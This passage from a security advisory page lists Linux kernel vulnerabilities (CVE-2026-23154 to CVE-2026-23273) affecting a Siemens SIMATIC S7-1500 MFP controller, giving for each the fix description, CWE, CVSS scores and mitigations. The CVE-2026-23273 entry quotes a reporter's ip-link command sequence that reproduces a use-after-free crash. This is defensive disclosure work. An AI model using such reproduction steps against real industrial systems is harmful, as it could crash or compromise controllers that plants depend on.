<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/835.html">CWE-835 Loop with Unreachable Exit Condition ('Infinite Loop')</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>5.5</td>
<td>MEDIUM</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23154</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net: fix segmentation of forwarding fraglist GRO This patch enhances GSO segment handling by properly checking the SKB_GSO_DODGY flag for frag_list GSO packets, addressing low throughput issues observed when a station accesses IPv4 servers via hotspots with an IPv6-only upstream interface. Specifically, it fixes a bug in GSO segmentation when forwarding GRO packets containing a frag_list. The function skb_segment_list cannot correctly process GRO skbs that have been converted by XLAT, since XLAT only translates the header of the head skb. Consequently, skbs in the frag_list may remain untranslated, resulting in protocol inconsistencies and reduced throughput. To address this, the patch explicitly sets the SKB_GSO_DODGY flag for GSO packets in XLAT's IPv4/IPv6 protocol translation helpers (bpf_skb_proto_4_to_6 and bpf_skb_proto_6_to_4). This marks GSO packets as potentially modified after protocol translation. As a result, GSO segmentation will avoid using skb_segment_list and instead falls back to skb_segment for packets with the SKB_GSO_DODGY flag. This ensures that only safe and fully translated frag_list packets are processed by skb_segment_list, resolving protocol inconsistencies and improving throughput when forwarding GRO packets converted by XLAT.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23154">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/237.html">CWE-237 Improper Handling of Structural Elements</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>3.3</td>
<td>LOW</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23204</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: cls_u32: use skb_header_pointer_careful() skb_header_pointer() does not fully validate negative @offset values. Use skb_header_pointer_careful() instead. GangMin Kim provided a report and a repro fooling u32_classify(): BUG: KASAN: slab-out-of-bounds in u32_classify+0x1180/0x11b0 net/sched/cls_u32.c:221</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23204">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/1285.html">CWE-1285 Improper Validation of Specified Index, Position, or Offset in Input</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.1</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23231</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: fix use-after-free in nf_tables_addchain() nf_tables_addchain() publishes the chain to table-&gt;chains via list_add_tail_rcu() (in nft_chain_add()) before registering hooks. If nf_tables_register_hook() then fails, the error path calls nft_chain_del() (list_del_rcu()) followed by nf_tables_chain_destroy() with no RCU grace period in between. This creates two use-after-free conditions: 1) Control-plane: nf_tables_dump_chains() traverses table-&gt;chains under rcu_read_lock(). A concurrent dump can still be walking the chain when the error path frees it. 2) Packet path: for NFPROTO_INET, nf_register_net_hook() briefly installs the IPv4 hook before IPv6 registration fails. Packets entering nft_do_chain() via the transient IPv4 hook can still be dereferencing chain-&gt;blob_gen_X when the error path frees the chain. Add synchronize_rcu() between nft_chain_del() and the chain destroy so that all RCU readers -- both dump threads and in-flight packet evaluation -- have finished before the chain is freed.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23231">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23242</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: RDMA/siw: Fix potential NULL pointer dereference in header processing If siw_get_hdr() returns -EINVAL before set_rx_fpdu_context(), qp-&gt;rx_fpdu can be NULL. The error path in siw_tcp_rx_data() dereferences qp-&gt;rx_fpdu-&gt;more_ddp_segs without checking, which may lead to a NULL pointer deref. Only check more_ddp_segs when rx_fpdu is present. KASAN splat: [ 101.384271] KASAN: null-ptr-deref in range [0x00000000000000c0-0x00000000000000c7] [ 101.385869] RIP: 0010:siw_tcp_rx_data+0x13ad/0x1e50</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23242">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/476.html">CWE-476 NULL Pointer Dereference</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.5</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H">CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23243</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: RDMA/umad: Reject negative data_len in ib_umad_write ib_umad_write computes data_len from user-controlled count and the MAD header sizes. With a mismatched user MAD header size and RMPP header length, data_len can become negative and reach ib_create_send_mad(). This can make the padding calculation exceed the segment size and trigger an out-of-bounds memset in alloc_send_rmpp_list(). Add an explicit check to reject negative data_len before creating the send buffer. KASAN splat: [ 211.363464] BUG: KASAN: slab-out-of-bounds in ib_create_send_mad+0xa01/0x11b0 [ 211.364077] Write of size 220 at addr ffff88800c3fa1f8 by task spray_thread/102 [ 211.365867] ib_create_send_mad+0xa01/0x11b0 [ 211.365887] ib_umad_write+0x853/0x1c80</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23243">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/131.html">CWE-131 Incorrect Calculation of Buffer Size</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23245</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: act_gate: snapshot parameters with RCU on replace The gate action can be replaced while the hrtimer callback or dump path is walking the schedule list. Convert the parameters to an RCU-protected snapshot and swap updates under tcf_lock, freeing the previous snapshot via call_rcu(). When REPLACE omits the entry list, preserve the existing schedule so the effective state is unchanged.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23245">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/20.html">CWE-20 Improper Input Validation</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23270</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: net/sched: Only allow act_ct to bind to clsact/ingress qdiscs and shared blocks As Paolo said earlier [1]: "Since the blamed commit below, classify can return TC_ACT_CONSUMED while the current skb being held by the defragmentation engine. As reported by GangMin Kim, if such packet is that may cause a UaF when the defrag engine later on tries to tuch again such packet." act_ct was never meant to be used in the egress path, however some users are attaching it to egress today [2]. Attempting to reach a middle ground, we noticed that, while most qdiscs are not handling TC_ACT_CONSUMED, clsact/ingress qdiscs are. With that in mind, we address the issue by only allowing act_ct to bind to clsact/ingress qdiscs and shared blocks. That way it's still possible to attach act_ct to egress (albeit only with clsact). [1] https://lore.kernel.org/netdev/674b8cbfc385c6f37fb29a1de08d8fe5c2b0fbee.1771321118.git.pabeni@redhat.com/ [2] https://lore.kernel.org/netdev/cc6bfb4a-4a2b-42d8-b9ce-7ef6644fb22b@ovn.org/</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23270">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/416.html">CWE-416 Use After Free</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23271</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: perf: Fix __perf_event_overflow() vs perf_remove_from_context() race Make sure that __perf_event_overflow() runs with IRQs disabled for all possible callchains. Specifically the software events can end up running it with only preemption disabled. This opens up a race vs perf_event_exit_event() and friends that will go and free various things the overflow path expects to be present, like the BPF program.</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23271">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
<h5>Siemens SIMATIC S7-1500 CPU 1518(F)-4 PN/DP MFP</h5>
<div class="ics-vendor-version-status">
<div class="ics-vendor"><strong>Vendor:</strong><br>Siemens</div>
<div class="ics-version"><strong>Product Version:</strong><br>SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518-4 PN/DP MFP (6ES7518-4AX00-1AC0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AB0) &gt;= V3.1.6, SIMATIC S7-1500 CPU 1518F-4 PN/DP MFP (6ES7518-4FX00-1AC0) &gt;= V3.1.6, SIPLUS S7-1500 CPU 1518-4 PN/DP MFP (6AG1518-4AX00-4AC0) &gt;= V3.1.6</div>
<div class="ics-status"><strong>Product Status:</strong><br>known_affected</div>
</div>
<div class="ics-remediations">
<h6>Remediations</h6>
<p><strong>Mitigation</strong><br>Limit access to the interactive shell of the additional GNU/Linux subssytem to trusted personnel only.</p>
<p><strong>Mitigation</strong><br>Only build and run applications from trusted sources.</p>
<p><strong>None available</strong><br>Currently no fix is available</p>
</div>
<p><strong>Relevant CWE:</strong> <a href="https://cwe.mitre.org/data/definitions/672.html">CWE-672 Operation on a Resource after Expiration or Release</a></p>
<hr>
<h4>Metrics</h4>
<div class="csaf-table csaf-metrics-table">
<table class="tablesaw tablesaw-stack" data-tablesaw-mode="stack" data-tablesaw-minimap>
<thead>
<tr>
<th role="columnheader" data-tablesaw-priority="persist">CVSS Version</th>
<th role="columnheader">Base Score</th>
<th role="columnheader">Base Severity</th>
<th role="columnheader">Vector String</th>
</tr>
</thead>
<tbody>
<tr>
<td>3.1</td>
<td>7.8</td>
<td>HIGH</td>
<td><a href="https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H">CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H</a></td>
</tr>
</tbody>
</table>
</div>
</div>
</div>
<div class="csaf-accordion-item">
<h3><a class="csaf-accordion-toggle" href="https://www.cisa.gov/#">CVE-2026-23273</a></h3>
<div class="csaf-accordion-content">
<p>In the Linux kernel, the following vulnerability has been resolved: macvlan: observe an RCU grace period in macvlan_common_newlink() error path valis reported that a race condition still happens after my prior patch. macvlan_common_newlink() might have made @dev visible before detecting an error, and its caller will directly call free_netdev(dev). We must respect an RCU period, either in macvlan or the core networking stack. After adding a temporary mdelay(1000) in macvlan_forward_source_one() to open the race window, valis repro was: ip link add p1 type veth peer p2 ip link set address 00:00:00:00:00:20 dev p1 ip link set up dev p1 ip link set up dev p2 ip link add mv0 link p2 type macvlan mode source (ip link add invalid% link p2 type macvlan mode source macaddr add 00:00:00:00:00:20 &amp;) ; sleep 0.5 ; ping -c1 -I p1 1.2.3.4 PING 1.2.3.4 (1.2.3.4): 56 data bytes RTNETLINK answers: Invalid argument BUG: KASAN: slab-use-after-free in macvlan_forward_source (drivers/net/macvlan.c:408 drivers/net/macvlan.c:444) Read of size 8 at addr ffff888016bb89c0 by task e/175 CPU: 1 UID: 1000 PID: 175 Comm: e Not tainted 6.19.0-rc8+ #33 NONE Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.14.0-2 04/01/2014 Call Trace: dump_stack_lvl (lib/dump_stack.c:123) print_report (mm/kasan/report.c:379 mm/kasan/report.c:482) ? macvlan_forward_source (drivers/net/macvlan.c:408 drivers/net/macvlan.c:444) kasan_report (mm/kasan/report.c:597) ? macvlan_forward_source (drivers/net/macvlan.c:408 drivers/net/macvlan.c:444) macvlan_forward_source (drivers/net/macvlan.c:408 drivers/net/macvlan.c:444) ? tasklet_init (kernel/softirq.c:983) macvlan_handle_frame (drivers/net/macvlan.c:501) Allocated by task 169: kasan_save_stack (mm/kasan/common.c:58) kasan_save_track (./arch/x86/include/asm/current.h:25 mm/kasan/common.c:70 mm/kasan/common.c:79) __kasan_kmalloc (mm/kasan/common.c:419) __kvmalloc_node_noprof (./include/linux/kasan.h:263 mm/slub.c:5657 mm/slub.c:7140) alloc_netdev_mqs (net/core/dev.c:12012) rtnl_create_link (net/core/rtnetlink.c:3648) rtnl_newlink (net/core/rtnetlink.c:3830 net/core/rtnetlink.c:3957 net/core/rtnetlink.c:4072) rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) netlink_rcv_skb (net/netlink/af_netlink.c:2550) netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) netlink_sendmsg (net/netlink/af_netlink.c:1894) __sys_sendto (net/socket.c:727 net/socket.c:742 net/socket.c:2206) __x64_sys_sendto (net/socket.c:2209) do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:131) Freed by task 169: kasan_save_stack (mm/kasan/common.c:58) kasan_save_track (./arch/x86/include/asm/current.h:25 mm/kasan/common.c:70 mm/kasan/common.c:79) kasan_save_free_info (mm/kasan/generic.c:587) __kasan_slab_free (mm/kasan/common.c:287) kfree (mm/slub.c:6674 mm/slub.c:6882) rtnl_newlink (net/core/rtnetlink.c:3845 net/core/rtnetlink.c:3957 net/core/rtnetlink.c:4072) rtnetlink_rcv_msg (net/core/rtnetlink.c:6958) netlink_rcv_skb (net/netlink/af_netlink.c:2550) netlink_unicast (net/netlink/af_netlink.c:1319 net/netlink/af_netlink.c:1344) netlink_sendmsg (net/netlink/af_netlink.c:1894) __sys_sendto (net/socket.c:727 net/socket.c:742 net/socket.c:2206) __x64_sys_sendto (net/socket.c:2209) do_syscall_64 (arch/x86/entry/syscall_64.c:63 arch/x86/entry/syscall_64.c:94) entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:131)</p>
<p><a href="https://www.cve.org/CVERecord?id=CVE-2026-23273">View CVE Details</a></p>
<hr>
<h4>Affected Products</h4>
